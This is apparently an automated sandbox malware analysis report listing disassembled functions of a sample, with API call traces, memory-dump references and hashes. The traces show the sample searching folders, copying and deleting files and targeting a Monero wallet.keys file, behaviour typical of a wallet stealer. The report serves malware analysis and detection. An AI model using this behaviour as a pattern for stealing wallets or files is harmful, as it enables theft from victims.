Instruction ID: ccd20fd837681657d63b363e2be03cb9c05e5a936670122b6f5a4a67535b36f3
Opcode Fuzzy Hash: 350dcaba12c24109a1fb9643917a45e9c581a9d62443d9411d063a9b9e01a465
Instruction Fuzzy Hash: 2EE1F2B29101189BEB14FBA1CC92EEE7339AF54304F40495FF50662091EF7C6A59CB7A

Function 0047AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

lstrlen.KERNEL32(00000000), ref: 0047B16A
lstrlen.KERNEL32(00000000), ref: 0047B17E

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 77b87315eda70e371811903002f0b93d4d6b51397b6c78984ddcc32f8002db87
Instruction ID: a2eca4e4a5cc97b3213c6bff7c09be540f299488d862484a5c567717a122ef7b
Opcode Fuzzy Hash: 77b87315eda70e371811903002f0b93d4d6b51397b6c78984ddcc32f8002db87
Instruction Fuzzy Hash: 319143B19101149BEB04FBA1DC91EEE7339AF14304F40496FF506A6091EF7C6A59CBBA

Function 0047B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

lstrlen.KERNEL32(00000000), ref: 0047B42E
lstrlen.KERNEL32(00000000), ref: 0047B442

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: c70d29e5cc198ac3a6cf1d67454b3b3abe3c4851f95ae61721aafa43c53d2b45
Instruction ID: ac6ce81fc2a1eadaf4ce399cb91422fca127e0009f0f4fe7f917a37601a05a10
Opcode Fuzzy Hash: c70d29e5cc198ac3a6cf1d67454b3b3abe3c4851f95ae61721aafa43c53d2b45
Instruction Fuzzy Hash: D47152B19101149BEB04FBA1CC96DEE7339AF14304F40496FF506A2191EF7C6A59CBBA

Function 00484BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

lstrcat.KERNEL32(?,00000000), ref: 00484BEA
lstrcat.KERNEL32(?,0110D7C0), ref: 00484C08

Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943

Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
Part of subcall function 00484910: FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
Part of subcall function 00484910: FindClose.KERNEL32(000000FF), ref: 00484B92

Part of subcall function 00484910: wsprintfA.USER32 ref: 004849B0
Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,004908D2), ref: 004849C5
Part of subcall function 00484910: wsprintfA.USER32 ref: 004849E2
Part of subcall function 00484910: PathMatchSpecA.SHLWAPI(?,?), ref: 00484A1E
Part of subcall function 00484910: lstrcat.KERNEL32(?,0110E788), ref: 00484A4A
Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FF8), ref: 00484A5C
Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A70
Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FFC), ref: 00484A82
Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A96
Part of subcall function 00484910: CopyFileA.KERNEL32(?,?,00000001), ref: 00484AAC
Part of subcall function 00484910: DeleteFileA.KERNEL32(?), ref: 00484B31

Part of subcall function 00484910: wsprintfA.USER32 ref: 00484A07

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 811b054e3381adaad79c4efab4037256d04e64e016d5f29d33a1918558f10256
Instruction ID: 1bf67562db9402e02c3c4d5145dff030f30ca9a3d9e92311a4df32b97b4a46a9
Opcode Fuzzy Hash: 811b054e3381adaad79c4efab4037256d04e64e016d5f29d33a1918558f10256
Instruction Fuzzy Hash: CE41D6F75001046BCB54F7B4EC42EEE337EA788700F408A5DB54996186FD795BC88BA6

Function 00476660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00476706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00476753

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6e3684e25f08e4adfbbba6cebf7cf67f32e44a6a9c66a53c7869be0081ef69ed
Instruction ID: 819f8596e874eb28d143e5500cad0bc72f3441175f6efbef665ba0f7b38b9e02
Opcode Fuzzy Hash: 6e3684e25f08e4adfbbba6cebf7cf67f32e44a6a9c66a53c7869be0081ef69ed
Instruction Fuzzy Hash: AE41A774A00209EFCB44CF98C494BADBBB2FB44354F24C299E95D9B355D735AA81CF84

Function 00485050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

lstrcat.KERNEL32(?,00000000), ref: 0048508A
lstrcat.KERNEL32(?,0110E2D8), ref: 004850A8

Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: dc8bd0c60a498e596cfdf08effe040b02b0a43773b2ad66d077f7ad379a2335c
Instruction ID: 7c0464952e80ded5ff16d5878a05219c620da15b8519eb169cdbc9383fd63a0e
Opcode Fuzzy Hash: dc8bd0c60a498e596cfdf08effe040b02b0a43773b2ad66d077f7ad379a2335c
Instruction Fuzzy Hash: 5301DBB690020867C754FBB0DC42EEE337CAB54304F00468EB64952091EE789AC88BE6

Function 004710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004710B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004710F7

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 234cb2fb83887244116228abd73772ab23810611198253ef0b7c210e2134ba1f
Instruction ID: 601ae1a75bd9ff07285524ae3a99363c0ed73c1fb009980da8fb2b73a27519d3
Opcode Fuzzy Hash: 234cb2fb83887244116228abd73772ab23810611198253ef0b7c210e2134ba1f
Instruction Fuzzy Hash: 6FF0E2B1641308BBE7149AA8AC49FEFB7ECE705B15F305949F504E3390D5719E40CAA4

Function 00488D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00471B54,?,?,0049564C,?,?,00490E1F), ref: 00488D9F

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e5eb16298d42cae7b21d551ab833262604bade0c403a2fa746f76c26df89a125
Instruction ID: 6fca59578f785583b5843297569a1b15a615e2e8db0a5fd92366d11e0c73dbe9
Opcode Fuzzy Hash: e5eb16298d42cae7b21d551ab833262604bade0c403a2fa746f76c26df89a125
Instruction Fuzzy Hash: F7F01570C00208EBDB04FFA4D5496DDBBB4EB10314F508A9EE866673C0DB786A56DB85

Function 00488DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
